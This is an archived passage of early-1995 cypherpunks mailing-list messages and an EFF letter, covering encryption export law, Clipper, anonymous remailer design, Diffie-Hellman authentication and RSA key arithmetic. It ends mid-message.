From: ssteele@eff.org (Shari Steele)
Date: Wed, 1 Feb 95 07:38:08 PST
To: merriman@metronet.com
Subject: your membership renewal letter
Message-ID: <199502011537.KAA27134@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


February 1, 1995

Dear David,

We received your response to our membership renewal reminder and would like
to thank you for taking the time to actually write a letter explaining why
you have chosen not to renew.  We are sorry that you are unhappy with the
role EFF played in the Digital Telephony negotiations.  We were not totally
comfortable our role, but we do believe we did the right thing and that
there would be a much more intrusive bill if EFF had done nothing.

However, I'm sure that you've heard the arguments by now, and I'm not
writing to change your mind about our role in Digital Telephony but,
instead, to let you know about a lawsuit we're about to file against the
State Department and others claiming the ITAR listing of encryption as a
munition is unconstitutional.  Our plaintiff wanted to post an encryption
algorithm he developed to sci.crypt.  The State Department informed him
that he would need an export license before he could post the algorithm on
the Net and then told him that he would be denied the license because the
algorithm was too strong.  We see this as a critical First Amendment
challenge to a regulation that undermines secure communications on the
networks.  The suit should be filed before the end of the month.

We don't expect to please all of the people all of the time, and it is
clear that we didn't please you with Digital Telephony.  But we really are
trying to make Cyberspace a better place to be, and we hope you'll
reconsider your decision regarding your renewal.  You can earmark your
contribution to be applied only to litigation or some other particular
function, if that would make you feel more comfortable.

Take care.

Sincerely,
Shari

----------------------------------------------------------------------------
Shari Steele, Director of Legal Services                ssteele@eff.org
Electronic Frontier Foundation                 202/861-7700 (voice)
1667 K Street, N.W., Suite 801                    202/861-1258 (fax)
Washington, DC  20006-1605                    202/861-1224 (BBS)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Wed, 1 Feb 95 11:31:47 PST
To: Cypherpunks@toad.com
Subject: Clipper Revived?
Message-ID: <9501017916.AA791667001@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     From Edupage:
     
     REPLACEMENT FOR CLIPPER
     AT&T and VLSI Technology Inc. will collaborate to develop microchips 
     that use a triple-strength version of DES (data encryption standard), 
     which previously had been rejected by the National Security Agency. 
     VLSI is the designated contractor to make the government-favored 
     Clipper chips, but this latest announcement reveals their doubts over 
     whether there's a market for the Clipper. "These companies have 
     basically made the determination that Clipper is dead and there's 
     going to be the proliferation of encryption anyway, so they might as 
     well take advantage of it," says one observer, who predicts the market 
     for such technology "could reach hundreds of millions" of dollars in 
     annual sales by the end of the decade. (Wall Street Journal 1/31/95 
     A3)
     
John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@Earthlink.net        you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Wed, 1 Feb 95 09:43:00 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: "bad" government
Message-ID: <m0rZj0d-000E8pC@dorite.use.com>
MIME-Version: 1.0
Content-Type: text/plain



>> If strong government resulted in liberty and freedom, then the
>> most intrusive, all-encompassing governments would result in 
>> its citizens having the most liberty.  Is this the case?  I would
>> look at the (former) Soviet Union, Iran, Cuba, East Germany, etc., 
>> for your answer.

>Unrestricted individual freedom leads to unrestricted freedom of 
>`private' corporations.  Private corporations uncurbed by society's law are 
>autarkies: internally totalitarian, externally predatory, as amoral as 
>amoebas.
>
>Is this the shape of the future you seek?
  
'Tis better to err on the side of liberty.
 
To suggest otherwise would indicate that the origin and true meaning of 
"rights" or "liberty" is not understood.  
 
You can NOT restrict someone's rights simply because they MIGHT harm another 
(prior restraint).  If they do cause actual harm to someone, they should be 
brought to justice.  To place restrictions on someone based on the 
possibility that may may cause harm introduces restrictions based solely on 
the authorities' opinions (political philosophy, religion, race, etc).
 
That that the shape of the future YOU seek?
************************************************************
*           Just your basic signature block                *
*                                                          *
*  Al Thompson                                             *
*  Fidonet 1:231/110                                       *
*  alt@iquest.net                                          *
************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 1 Feb 95 09:53:27 PST
To: root@einstein.ssz.com (root)
Subject: Re: VoicePGP cracked in 10 minutes?...
In-Reply-To: <199502010348.VAA00506@einstein.ssz.com>
Message-ID: <199502011753.MAA21825@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Hi all,
> 
> I heard a rumor hear in Ctl. Tx. that the VoicePGP project was cracked in the
> last couple of days in approx. 10 minutes. Anyone have any info on this other
> than one of those wild rumors that occur?
> 
> Thanks and take care.
> 
Nope. That was "Call Security" which used something called Quick Public
Key (QPK?) that was apparently homemade.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 1 Feb 95 09:58:08 PST
To: cypherpunks@toad.com
Subject: What's with anon.penet.fi??
Message-ID: <199502011757.MAA21864@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject says it. Every message I post to the list gets a reply saying
that I am abusing the remailer by posting chain letters etc.

All replies to admin@anon.penet.fi are also getting bounced back too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Wed, 1 Feb 95 13:03:39 PST
To: Thomas Grant Edwards <eric@remailer.net>
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <ab559e8c000210040b91@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:49 PM 1/31/95, Thomas Grant Edwards wrote:
>On Tue, 31 Jan 1995, Eric Hughes wrote:
>
>> Just because plain old Diffie Hellman is subject to active attack
>> doesn't mean it's useless.  Some protection is better than no
>> protection at all.  It's still worthwhile implementing some security
>> to make an opponent's task harder than to implement no security.
>
>I'm curious though if there is some way to reduce the risk or at least
>increase the detectability of active DH spoofing.   I am thinking of the
>use of a trusted adjudicator who could receive information from both the
>original participants and check to see if the two keys matched.
>
>Does anyone see a good solution to this problem?
....
I trust that that the attack refered to is the "man-in-the-middle". I find
it very curious that there is a simple fix to the attack for the enctrypted
voice channel. Each unit displays to its human a few bits of g^(xy). One
human quotes them vocally to the other. If there is a man in the middle the
bits are unlikely to match. What I find curious is that there seems to be
no automated analog to this precaution. It has to do with the difficulty of
substituting the vocal signals that code these bits. This is too hard for
either computer or man (in the middle). I write to stimulate a solution. I
have none.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 1 Feb 95 11:28:22 PST
To: Anthony Ortenzi <ortenzi@interactive.net>
Subject: Re: Fundamental Question?
Message-ID: <9502011924.AA02931@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Although I understand the need for remailers for anonymity, is it
>  not true that the whole idea of encryption (good encryption, that
>  is) is that no matter who gets the encrypted text, it really doesn't
>  matter?  Does this not mean that something like USENET is *perfect*
>  for this?

Usenet may be provide good untracability for the recipient, but the if the  
sender desires untracability she needs to use a remailer or some other  
service to get the message into Usenet.  Also, the recipient needs to know if  
and where to look for the message.  If the recipient isn't anticipating the  
receipt of a message untracably, or doesn't care if 'they' know she is  
receiving the message, then Usenet isn't necessary.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Wed, 1 Feb 95 05:18:47 PST
To: cypherpunks@toad.com
Subject: Re: CD-ROM [brief addition]
Message-ID: <199502011233.AA16433@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <199502010224.SAA24809@infinity.c2.org> sameer stated:

: 	I forgot to mention that the CD-ROM in development will be
: export restricted. It isn't going to be sold outside the united states
: and canada.

Why not produce it outside the US and import it ?

Regards,
--
Alex de Joode					    
usura@replay.com	                               Hate mail appreciated,
http://www.xs4all.nl/~usura             weekly contest for best death threat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Wed, 1 Feb 95 10:54:36 PST
To: cypherpunks@toad.com
Subject: Fundamental Question?
Message-ID: <Pine.BSI.3.91.950201135326.29214A-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain


Although I understand the need for remailers for anonymity, is it not 
true that the whole idea of encryption (good encryption, that is) is that 
no matter who gets the encrypted text, it really doesn't matter?  Does 
this not mean that something like USENET is *perfect* for this?

				-Anthony







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 1 Feb 95 11:12:48 PST
To: ortenzi@interactive.net (Anthony Ortenzi)
Subject: Re: Fundamental Question?
In-Reply-To: <Pine.BSI.3.91.950201135326.29214A-100000@ns.interactive.net>
Message-ID: <199502011911.OAA09754@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Although I understand the need for remailers for anonymity, is it not 
| true that the whole idea of encryption (good encryption, that is) is that 
| no matter who gets the encrypted text, it really doesn't matter?  Does 
| this not mean that something like USENET is *perfect* for this?

	Its awfully expensive to send messages all over creation so
one person can read them.  Much better to send it to the person who
wants to read it.  Besides, USENET propagation can be slower than
remailers; the far ends of the chain can often take around a week.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 1 Feb 95 05:56:14 PST
To: cypherpunks@toad.com
Subject: PGP Question
Message-ID: <9502011343.AA00578@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Is there any simple way to glue a binary file and its detached pgp
signature together into a single pgp file (as produced by non-detached
signing) ?

thanks
Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 1 Feb 95 05:56:47 PST
To: cypherpunks@toad.com
Subject: Re: CD-ROM [brief addition]
Message-ID: <9502011353.AA00592@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> Why not produce it outside the US and import it ?

:-)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Wed, 1 Feb 95 12:11:00 PST
To: cypherpunks@toad.com
Subject: Re: Fundamental Question?
Message-ID: <199502012007.PAA13259@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199502011911.OAA09754@bwnmr5.bwh.harvard.edu>,
Adam Shostack <adam@bwh.harvard.edu> wrote:
>	Its awfully expensive to send messages all over creation so
>one person can read them.  Much better to send it to the person who
>wants to read it.  Besides, USENET propagation can be slower than
>remailers; the far ends of the chain can often take around a week.

1.  Let's have some perspective here.  Remailer traffic can't really be
expected to exceed the traffic in, for example, alt.binaries.pictures.erotica.
Additionally, with USENET it's trivial to control when are whether you
receive particular groups.  Don't want to carry alt.anonymous.remailer.channel?
No problem.  Don't.

2.  USENET propogation is not that slow;  Between well connected sites
(IE, just about any Internet host that isn't swamped for other reasons
like Netcom frequently is) I haven't seen a larger lag than a few hours.

The biggest reason to use remailers is not to avoid interception of
traffic: that's a trivial problem with PGP.  The biggest threat is that
of traffic analysis: Alice doesn't want her boss Charlie to know she's
having an ongoing discussion with Bob about a new "career opportunity."

As I've said, I think USENET is perfect for this.  Add some reordering to
the processing and a hidden way to define the intended recipients and no
way that passive traffic analysis is going to succeed.
- - --
Todd Masco     | "Schooling serves to reduce the risk of being eaten."
cactus@hks.net |                           - Scientific American, June, 1982
     Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy+w1xNhgovrPB7dAQFjcgQAqc6eu22NAB8wE5iAyyGMTFbwlXLbiHF0
FUmJlWXQ4J8EkPXEa+ZUKGlcbCETjQ2rXxzHh3cOiVxjRVnKKh5Q/VmU4JOALPXE
lBIfH+W8ty0LxaXBue9KkXh4cFvoehW7UXhq9oitNgSqiTmf/EoCbjJc5A7w7YHd
Aqu7sgyyPFQ=
=4UNd
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLy/p3CoZzwIn1bdtAQGkNgGAtR+F+nkckmLHgvrlurrHsGng24kdBu4R
20AwntDjdEcZjNHAqrc/aCf8TKVhUUJV
=o09G
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 15:23:59 PST
To: cypherpunks@toad.com
Subject: Re: Fundamental Question?
Message-ID: <9502012323.AA00271@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>2.  USENET propogation is not that slow;  Between well connected sites
>(IE, just about any Internet host that isn't swamped for other reasons
>like Netcom frequently is) I haven't seen a larger lag than a few hours.

Consider the incoming directory on my local news host:

--
jlc:/usr/spool/news/in.coming$ ls -l
total 401
-rw-r--r--   1 news     news       172237 Feb  1 16:08 21705-000000.t
drwxr-xr-x   2 news     news         1024 Jan 31 13:43 bad/
-rw-r--r--   1 news     news        79792 Jan 27 12:35 nntp.a00606
-rw-r--r--   1 news     news       130025 Feb  1 16:09 nntp.a21731
drwxr-xr-x   2 news     news        21504 Jan 21 12:57 save/
-rwxr-xr-x   1 news     news          194 Nov 30 14:22 unz*
jlc:/usr/spool/news/in.coming$ grep Date 21705-000000.t | more
Date: Mon, 30 Jan 1995 18:28:21 GMT
Date: Mon, 30 Jan 1995 18:34:30 GMT
Date: 30 Jan 1995 11:03:14 -0800
Date: 30 Jan 95 13:25:19 +0200
Date: 30 Jan 1995 13:35:59 -0500
Date: 30 Jan 95 17:59:27 GMT
Date: 30 Jan 1995 13:25:40 -0500
Date: 27 Jan 1995 14:11:51 -0600
Date: 27 Jan 1995 14:50:32 -0500
--

The majority of incoming messages are two days old (this was on Feb 1 at
16:10, GMT -7); the worst instance in this particular batch was six days
old (posted from a backwater site in Sweden).

Before you object that this is obviously a poorly-connected site, we're
on a leased 56K line two hops from the backbone (we're fed by BYU, who
is in turn fed by the University of Utah, one of the original four
internet sites and as well fed as you get). Our server is keeping up
with the incoming news. I suspect this is a pretty typical scenario.

--
    Kevin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 1 Feb 95 13:37:44 PST
To: norm@netcom.com (Norman Hardy)
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <ab559e8c000210040b91@DialupEudora>
Message-ID: <199502012138.QAA26261@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>I trust that that the attack refered to is the "man-in-the-middle". I find
>it very curious that there is a simple fix to the attack for the enctrypted
>voice channel. Each unit displays to its human a few bits of g^(xy). One
>human quotes them vocally to the other. If there is a man in the middle the
>bits are unlikely to match. What I find curious is that there seems to be
>no automated analog to this precaution. It has to do with the difficulty of
>substituting the vocal signals that code these bits. This is too hard for
>either computer or man (in the middle). I write to stimulate a solution. I
>have none.
>
>
The reason there's no "computer" analog to the "anti-spoofing vector"
for human-human voice communication lies in the definition of
authentication.  In a formal sense authentication here means binding a
secret that only you know to the encrypted channel.  In the case of voice
communication over an encrypted link, that "secret" consists of the ability
to hold a convincing exchange that sounds like your voice.  You bind the
secret to the channel by speaking a hash of the key.  Computers, not
pre-equipped with biological mechanisms for establishing who they are,
need to use another secret (like knowledge of the secret part of a public
key signature pair) to which only the computer you want to authenticate has
access.

The encrypted human voice authentication scheme is only as strong as it
is hard to spoof voices.  Digital signature authentication is only as
strong as it is hard to break the signature scheme or compromise the
signing key.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Masco <cactus@hks.net>
Date: Wed, 1 Feb 95 13:47:13 PST
To: cypherpunks@toad.com
Subject: FMP
Message-ID: <199502012143.QAA14255@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Can anybody tell me where I might be able to find the FMP library (
Riordon's PD GMP-a-like)?  Archie turns up empty.

Thanks,
- --
Todd Masco     | "Schooling serves to reduce the risk of being eaten."
cactus@hks.net |                           - Scientific American, June, 1982
     Cactus' Homepage

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzAAXyoZzwIn1bdtAQHjuwF+JHUY0HeNtzptxC2hTuVRrNV/s9/k1DeZ
F0XE3PUFvSTBCyo9iv++O31td0xt1YWj
=3iAP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 15:48:30 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <9502012348.AA00549@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Without quoting the entire message, I think I better solution, in terms of
>ease to implement as well as conserving bandwidth would be to have a
>sophisticated remailer script-language.
>
>For instance, the script language could tell the remailer to check if a
>site is on-line (perhaps within certain GMT hours or dates) and use the
>next site if not available, or to randomly choose from a list of sites
>the active ones, etc.

Aye, there lies the rub. How exactly does one determine if a site is
active or generate a current list of active sites? It is not enough to
ping the site or even to successfulyl deliver mail to it: the fact that
something is alive and running sendmail does not make it a remailer.

Likewise, a remailer cannot select an alternate site on behalf of the
user if the routing is chosen by the user, as each "envelope" is
encrypted specifically for a given remailer. I suppose one could develop
client software that built several redundant "envelopes" for alternate
mailers, but that would get out of hand pretty quickly, both in terms of
the effort of generating a secure message and in term of the size of a
message.

Scripting is useful (hell, the ::Request-Remailing lines are effectively
a script) but not until there is data to operate on.

>Maybe even have it work with a data haven? Mail the message to a data haven
>and send another message to a remailer chain to pull the message from the
>data haven and post the data (not flaws in this: don't want remailers getting
>files from people's accounts and posting them to usenet etc.).

Not a bad idea, actually.

--
    Kevin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 16:17:20 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <9502020017.AA00895@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>1.  Broadcasting every couple of minutes isn't necessary and is undesirable
>due to the real limitations of the Internet.  A remailer could broadcast
>its location with a time-out on the location without a constant stream
>of availability announcements.  In your position for example, you'd
>broadcast a message at 5 pm with a 16 hour valid time.

True, but this has two basic assumptions that I disagree with: first,
that we can guarantee delivery of a broadcast message to all interested
sites; and second, that remailers never go down for unexpected reasons.
When the day comes that both networks and software are perfect, this
method will be reliable. Of course, you are also right that broadcasting
is undesirable; that is why I am pondering a way to minimize the impact.

>2.  This is actually unnecessary for your situation: All you need to do is
>advertise your location as a "real" remailer and then have a cron job that
>kill sendmail at 5pm on your remailer machine (assuming you have a spare
>machine that doesn't need to run sendmail).  The mail network is flexible
>enough that things will Just Work.  Mail won't go through instantly during
>the day, of course, but that just helps to muddy up the mix.

But, if my understanding of remailer operation is correct, this has two
potential problems: first, I will still receive mail during the day,
causing a bandwidth concern (I know, it's probably not a problem right
now, particularly since users will probably choose to avoid a remailer
with a possible 16 hour delay); and second, the machine delivering mail
to me simply has to trust that a remailer will in fact pop up on this
machine to process the stored mail. There is no way of determining that
mail is not simply going into a black hole. And even if I try to be nice
when the mailer goes down permanently and tell everyone not to route
mail through it any more, that news still has to travel via word of
mouth to all users of the web.


>
>3.  Broadcasting over live IP isn't all that great a model.  Ideally,
>you'll use a mechanism that doesn't require instant communication among
>hosts.  I favor USENET for this: messages have a naturally long life-
>time and the network is self-adjusting.  If a direct route is temporarily
>unavailable, an indirect one will often manifest itself.  I also favor
>using USENET store-and-forward for the messages themselves for the same
>reasons: traffic analysis is impossible inside the web and direct routes
>are not necessary.

I am not happy with my proposed advertising methods, and was quietly
hoping for some guidance from internet gurus in this point (the irc
suggestion in particular is a pretty shaky straw man). However, see my
earlier message (on some other thread) about Usenet propagation times.
Propagation times in days do not seem to be rare (post to misc.test and
see when the last reply comes back). While this is better than
word-of-mouth propagation, it does not offer the very low latency I was
looking for.

>4.  Using a PGP-style web-of-trust is important.  In the ideal situation,
>one human in an extended web can certify individual remailers and all other
>remailers close enough on the same web of trust would pick up the message
>immediately.

It strikes me as critical; right now, a user has to choose to trust a
set of remailers, given no assistance other than a list of "reliable"
ones. Given an extended web of trust between remailers, the user can
choose to trust one remailer (I have no idea how to make this process
more palatable) and immediately gain the security of a large web of
remailers (maybe you are right about that instant gratification
thing...)

    Kevin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 17:00:38 PST
To: cypherpunks@toad.com
Subject: Re:  Frothing remailers - an immodest proposal
Message-ID: <9502020100.AA01613@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>I have some concerns about Kevin's frothing remailers.  Like so many of
>the proposals we see to put more responsibility into the remailer net,
>this opens vulnerability to a single bad remailer.  If I trust the first
>remailer in the net to choose my path for me, as I might be tempted to
>do with a froth, then if that remailer is corrupt my anonyminity is lost.
>With user-supplied chaining I am secure unless all of the remailers on
>the chain are corrupt.

Firstly, I certainly do not propose that we remove user-supplied
chaining; it is obviously vital to true anonyminity. What I am
suggesting is that we allow remailers to introduce more noise into the
mix using information that users cannot easily obtain for themselves
(e.g. which remailers are in operation at this moment). In the
apparently common case of unencrypted messages crossing the net, this is
at least no worse than the current situation. Of course, we would also
have to allow users to specify that no munging of the route be allowed
(some form of scripting). Trusting remailers to obey this request
requires no more trust than we already place in them (which, I believe,
is considerably more than most seem willing to admit).

If you succumb to the temptation and trust remailer #1 totally, then you
of course run the risk of sacrificing anonyminity. However, if you do
not trust remailer #1 so completely and specify a chain of remailers,
but allow remailer-generated routing between the points on that chain,
you gain resistance to traffic analysis as well as making it possible
for smaller transient remailers to play a useful role.

>I also do not like the kind of close-knit, cozy cooperation among the
>guild of remailer operators which seems to be envisioned in this and
>similar proposals.  Do you like the idea of messages on the remailer
>operators list saying, I am getting objectionable messages from your
>remailer, would you mind dropping in a log so we can see who is sending
>these messages which violate the Politically Correct Speech Act?

I don't see what would prevent this from happening now. The only degree
of cooperation I require from remailer operators is that they agree on
some software standards and that, if they choose, they create extended
webs of trust via signing one another's keys. There is no requirement
that all remailers or remailer operators trust all other remailer
operators; in fact, I think this would be undesirable, even if the trust
were justified.

Again, remember that control lies with the user. If you choose, you can
allow a remailer to bounce your mail through its web of trust before
forwarding it to the next point on your chain. I do not believe that
this increases the risk of losing anonyminity. I do also propose that
this be the default behavior in order to provide naive users with some
degree of security, as well as using their traffic to obscure that of
more sophisticated users.

>I do like Kevin's ideas about a dynamic remailer net, but I think
>another approach would put more smarts into the client program used by
>the originator.  Granted, his information will be somewhat more out of
>date as the message makes its way through the network.  But depending
>on thie time scale at which the froth, um, froths, this should still
>allow a lot more dynamism among the set of remailers.  Using either IRC
>or, as Todd suggested, Usenet to maintain an active remailer list might
>work.  We could also have a distributed set of sites which provide the
>information by finger like the pinging sites we have now.

True, all true (I seem to be saying this a lot today). My transient
remailer problem can be solved by publishing the times of availability
(assuming, of course, that my remailer will always be up when
scheduled). My only serious objection to this is that there will always
be more clients with more operating systems and platforms than there
will be servers. I don't expect that it will be easy to create new
standards for remailers and get significant numbers of operators to
implement or use them, but I do believe that that task is easier than
making smart clients available on all possible platforms.

[ Safe-TCL comments deleted]

>What you need then is some way for various messages to interact with each
>other, so that, for examle, a message could wait until there were a
>certain number of other messages inside the machine before it sent itself
>out.  You would also want a way for a message to suspend itself until
>some future event, such as having a certain amount of time passing, or
>waiting until some message with desired properties arrived.

This is a fine suggestion; as I mentioned in an earlier message,
scripting is not useful without data to operate on. You have suggested a
number of data that a remailer could usefully provide to a message,
making scripting more useful. Of course, you have to trust that the
remailer is not lying to your script.

[ More Safe-TCL comments and a plea for smarter clients rather than
smarter servers, to which I reply with the earlier argument, deleted.]

--
    Kevin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 31 Jan 95 22:33:39 PST
To: cypherpunks@toad.com
Subject: Re: CD-ROM [brief addition]
In-Reply-To: <199502010224.SAA24809@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.950201173554.15921D-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, sameer wrote:

> 	I forgot to mention that the CD-ROM in development will be
> export restricted. It isn't going to be sold outside the united states
> and canada.

Don't worry - we sorta figured that :-(

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjwohler@netcom.com (Marc Wohler)
Date: Wed, 1 Feb 95 17:57:46 PST
To: cypherpunks@toad.com
Subject: NYC area C'Punks meet 2/11/95
Message-ID: <199502020150.RAA29578@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Attn.: New York City area Cypherpunks

NYC C'punks meeting:

Sat Feb 11, 3:00 P.M., at the home of Linn & Barbara  Stanton
315 West 106 Street  Apt 2A 
(Between West End Ave & Riverside Drive)
212-316-1958.

Once again the gracious Stanton's invite local area Cpunks to
their lovely home which is smoke free and feline friendly.

The agenda is still open and suggestions can be made to
mjwohler@netcom.com
or phone Marc Wohler @ 212-362-0690. Let me know if you plan to
attend.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy+PL2eikzgqLB7pAQGHigP9HW1Py30O2fcZH/f1SAOToOBZYVZMiB9c
buGQrujaicGVJlvGb1Le/OjJ872JB69BQD1MMsemABSYi4swL15w9qj1rhoTAHIg
yTRDFJD16g1lqqLvEJZ0RijOh1dXLaUg8HNue0JoSAbARkQed8I3+mklP4C4saYn
qW2Fa/kDuZY=
=Rl9C
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Wed, 1 Feb 95 17:18:11 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <9502020118.AA01956@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[deletia]

>Now, dynamic rerouting is good for better delivery, but is bad for the
>trust in silence.  Trust in externally unverifiable properties is
>_not_ transferrable.  Just because I believe that my regular remailer
>is OK does not mean you do.  The creation of these links of trust is
>not something that can be automated solely by the remailer operators.
>The end users of the remailers are the endpoints of this trust
>relationship.  The end users must be involved, either directly or
>through some (legal) agent, in the manipulation of these relationships.

First, I must admit to being somewhat out of my depth here; this seems
to be becoming a philosophical problem. With that shameful admission out
of the way, let me bull ahead regardless.

It seems to me that I can choose to trust in the fact that *your* trust
in other remailers is well founded. This then becomes a third category
of trust for a given remailer: trust that it will deliver (verifiable);
trust that it will be silent (unverifiable); and trust that its
operator has good judgement in choosing who to trust (unverifiable).
These latter two are, and should be, the end users responsibility.

Now, as I have mentioned in an earlier message (I'm being far too
verbose today) I am proposing that dynamic routing be optional, though
the default behavior, for reasons mentioned there. Thus, if I, as user,
choose to allow dynamic routing (through omission - I must admit, I am
becoming less fond of the notion of this as default behavior - it begins
to smack of the heresy of "implied consent") I am expressing the third
flavor of trust, just as by using the remailer at all, I am expressing
the second variety.

Of course, I still have to trust that a remailer will honor my routing
requests. However, I believe this falls fair and square into the second
category (trust in silence)

>Any solution which tries to do this independent of the end user is
>broken, by definition.

--
    Kevin

    ( I have no joke here, I just like saying "I trust a remailer if
      it is trusted by an entity I trust to trust remailers".)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Feb 95 18:13:38 PST
To: cypherpunks@toad.com
Subject: Re:  Lucky primes & omlets on my face...
Message-ID: <199502020213.SAA17094@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Nathan Zook <nzook@bga.com>

> Recall:  x^p = x mod p therefore, x^(p-1) = 1 mod p. So what we need is:
> (x^e)^d = x^ed = x^(p-1)*i+1 = x mod p.  

This would only be true for prime p, but with RSA we are dealing with
composite moduli.  What we want is ed=1 mod phi(n), where
phi(n)=(p-1)(q-1).  (Actually you want to use (p-1)(q-1)/gcd((p-1),(q-1)).
I forget what that is called.)

Conceptually, I gather you are setting e = 0x10001, then finding its
multiplicative inverse d mod phi(n) (or mod p-1 in your example).  Then
you are looking for other possible values for d.  I am a little unclear
on what the interval would be between suitable values of d.  I think it
would be phi(n)/gcd as above, or p-1 in your example, but I am not sure.

> Let's try this again.
>  
> Let 2*x be the target number of bits in the modulous.
>  
> Let n be a large random number with x+2 digits.
> Let n1 be the next multiple of 0x10001.
> Let t2 be n1 mod 8, t3 be n1 mod 9, t5 be n1 mod 25, t7 be n1 mod 49.
>  
> Loop:
> For i = 2 to 7
>  If n1 = 1 mod i and (n1-1)/i + 1 is not a multiple of {2,3,5,7}
>     If (n1-1)/i + 1  is prime.
>       {
